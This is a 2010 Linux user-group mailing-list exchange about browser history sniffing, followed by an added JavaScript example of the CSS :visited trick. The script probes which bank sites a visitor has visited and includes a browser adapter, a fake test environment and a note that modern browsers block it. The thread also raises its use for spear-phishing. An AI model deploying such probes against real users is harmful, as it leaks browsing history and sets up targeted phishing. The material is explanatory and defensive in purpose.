[kwlug-disc] DuckDuckGo.com -- an alternate search engine
Fernando Duran
liberosec at yahoo.ca
Tue Aug 3 15:46:17 EDT 2010
Hi,
It's JavaScript so the source code for the trick is available in the page. As
it's been said it's based on the browser's capability to know the sites you've
visited before (same as when it changes the colour of a visited link). I just
took somebody's (open source) code and added some of the most common Canadian
web sites.
There's no privacy issue I can think of unless someone could correlate for
example the visitor's IP address with an identity. In any case the information
of what's our bank is so easy to get by traditional means that we can consider
it public.
There's also no direct security issue with the JS trick although it could be
used in some sort of "spear-phishing" to convince a potential victim in a
malicious web page (where it's detected he uses bank X) to click on a false page
resembling X to get his login information.
---------------------
Fernando Duran
http://www.fduran.com
----- Original Message ----
> From: Johnny Ferguson <hyperflexed at gmail.com>
> To: kwlug-disc at kwlug.org
> Sent: Thu, July 29, 2010 4:36:34 PM
> Subject: Re: [kwlug-disc] DuckDuckGo.com -- an alternate search engine
>
> On 07/28/2010 11:12 AM, Fernando Duran wrote:
> >
> >
> > ----- Original Message ----
> >> From: Eric Gerlach<eric+kwlug at gerlach.ca>
> > ...
> >>
> >> Attack #1: Using existing logins
> >>
> >> - You're logged into a site you care about (let's say your bank, or
> >> launchpad)
> >> - Malicious Javascript looks through your history (yes, it can do this)
> >> to find recently visited sites that it knows about
> >
> >
> > Just tooting my own horn: detecting browser's history is very easy to do,
> > we implemented it in http://watsec.com/myip
> >
>
> How is this accomplished? I'm rather disgusted that enabling js can let
> people know who my bank is.
>
> -Johnny
>
> > Cheers,
> >
> > Fernando
> > http://fduran.com
> >
> > _______________________________________________
> > kwlug-disc_kwlug.org mailing list
> > kwlug-disc_kwlug.org at kwlug.org
> > http://astoria.ccjclearline.com/mailman/listinfo/kwlug-disc_kwlug.org
>
>
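The :visited trick the thread is describing, written out as an added example (this is not the watsec.com/myip code and was not posted by anyone in the thread): the page injects a stylesheet that gives visited links a distinctive colour, creates one anchor per candidate site, and asks getComputedStyle() which colour the browser actually applied. The candidate URLs, the `sniffHistory`/`fakeEnv` helper names and the fake browser environment used for the self-test are all constructed for this example. The caveat a practitioner needs today: Firefox 4 and Chrome 9 onward deliberately report the unvisited colour from getComputedStyle() for :visited links, which is what the `leaks = false` fake models, so on a current browser the probe comes back empty.

```javascript
// Added example of CSS :visited history sniffing as it worked in 2010-era
// browsers. Not the watsec.com/myip code; site list and fake browser below
// are constructed for illustration.

// Distinctive colour assigned to :visited links. Pre-2011 browsers returned
// the real applied colour from getComputedStyle(), leaking one history bit
// per link.
const VISITED_RGB = "rgb(12, 34, 56)";
const UNVISITED_RGB = "rgb(0, 0, 0)";

// Browsers serialise colours differently ("#0c2238" vs "rgb(12,34,56)"),
// so normalise to one canonical "rgb(r, g, b)" form before comparing.
function normalizeColor(c) {
  c = String(c).trim().toLowerCase();
  const hex = c.match(/^#([0-9a-f]{6})$/);
  if (hex) {
    const n = parseInt(hex[1], 16);
    return `rgb(${(n >> 16) & 255}, ${(n >> 8) & 255}, ${n & 255})`;
  }
  const rgb = c.match(/^rgba?\(\s*(\d+)\s*,\s*(\d+)\s*,\s*(\d+)/);
  if (rgb) return `rgb(${+rgb[1]}, ${+rgb[2]}, ${+rgb[3]})`;
  return c;
}

// Stylesheet the probe page injects: only :visited gets the marker colour.
function probeStylesheet() {
  return `a.probe { color: ${UNVISITED_RGB}; } ` +
         `a.probe:visited { color: ${VISITED_RGB}; }`;
}

// Run the probe against a DOM-like environment. `env` supplies the browser
// hooks the trick needs, so the same logic can be driven by a fake offline.
function sniffHistory(candidates, env) {
  const style = env.createElement("style");
  style.textContent = probeStylesheet();
  env.append(style);
  const visited = [];
  for (const url of candidates) {
    const a = env.createElement("a");
    a.href = url;
    a.className = "probe";
    a.textContent = url;
    env.append(a);
    const color = normalizeColor(env.getComputedStyle(a).color);
    env.remove(a);
    if (color === normalizeColor(VISITED_RGB)) visited.push(url);
  }
  env.remove(style);
  return visited;
}

// Adapter for a real browser: what a malicious page would actually call.
function browserEnv(doc = globalThis.document, win = globalThis.window) {
  return {
    createElement: (t) => doc.createElement(t),
    append: (el) => doc.body.appendChild(el),
    remove: (el) => el.remove(),
    getComputedStyle: (el) => win.getComputedStyle(el),
  };
}

// Fake environment for offline runs. `leaks = true` models a 2010 browser
// that reports the true :visited colour (here in hex form, to exercise the
// normalisation); `leaks = false` models the Firefox 4 / Chrome 9 fix, which
// always reports the unvisited colour to script.
function fakeEnv(history, leaks) {
  const visitedSet = new Set(history);
  return {
    createElement: (t) => ({ tagName: t.toUpperCase() }),
    append: () => {},
    remove: () => {},
    getComputedStyle: (el) => ({
      color: leaks && el.tagName === "A" && visitedSet.has(el.href)
        ? "#0c2238"
        : UNVISITED_RGB,
    }),
  };
}

// Constructed candidate list (stand-ins for "the most common Canadian sites").
const CANDIDATE_SITES = [
  "https://bank-a.example/",
  "https://bank-b.example/",
  "https://webmail.example/",
];

// In a browser this runs the real probe; in Node it is skipped.
if (typeof document !== "undefined") {
  console.log("visited:", sniffHistory(CANDIDATE_SITES, browserEnv()));
}
```

The fake with `leaks = false` is the check worth keeping: if a probe page built this way returns an empty list in your browser, the :visited mitigation is in effect and the spear-phishing scenario in the message above no longer gets its targeting hint from this channel.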